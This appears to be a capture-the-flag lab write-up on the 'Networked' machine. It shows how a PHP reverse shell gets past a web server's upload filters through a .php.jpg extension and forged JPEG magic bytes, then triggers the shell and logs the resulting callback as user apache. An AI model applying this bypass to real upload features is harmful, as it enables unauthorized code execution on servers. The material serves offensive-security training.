InfoSec LAB

Networked_Exploitation

Created: 3 min read

Arbitrary File Upload

Based on the analysis made, it would appear that I will be able to exploit the file upload feature in the web server.

The file upload feature contains several security measures. a total of 4. they are:

  • Extension/Type
  • Size
  • Mime Type
  • IP Filter Those above need to be taken care of for a successful exploitation

The payload size is about 9.1K bytes. It doesn’t exceed the size limit of 60k I do not need to worry about the IP filter as my IP Address starts with 10.10

That leaves me 2 things to work with

Extension/Type

The allowed extensions are .jpg, .png, .gif, .jpeg

I will go with .jpg

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ mv shell.php shell.php.jpg

I changed the file extension to .php.jpg. It will now go through the filter By changing the file extension, The Content-Type header should now automatically pick it up as image

Mime Type (Magic Number)

according to wikipedia, .jpg files have a hex signature of FFD8FFE0 Each hex character is 1 byte, so is the individual ascii character

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ sed -i '1s/^/AAAA\n/' shell.php.jpg

First, I will append 4 A’s to the top of the payload

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ hexeditor shell.php.jpg

I will then open up the payload using hexeditor to modify those 4 A’s

The first 4 bytes of the file is 4 of 41, which is A in ASCII Those are the 4 A’s that I appended earlier.

I changed those 4 A’s to match the hex signature of .jpg file

This should bypass the MIME filter(check_file_type) in the lib.php file

Exploitation

Uploading the payload

As can be seen, the Content-Type header has already picked up on that extension and set it to image/jpeg

Upload is complete

Triggering the payload by nagivating to /photos.php I can see the uploaded payload. The browser hangs as the web server loading /photos.php triggers the PHP reverse shell embedded in the payload

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ nnc 9999                    
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 46014
SOCKET: Shell has connected! PID: 4406
whoami
apache
hostname
networked.htb
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as apache via arbitrary file upload

Interactive Graph View

Backlinks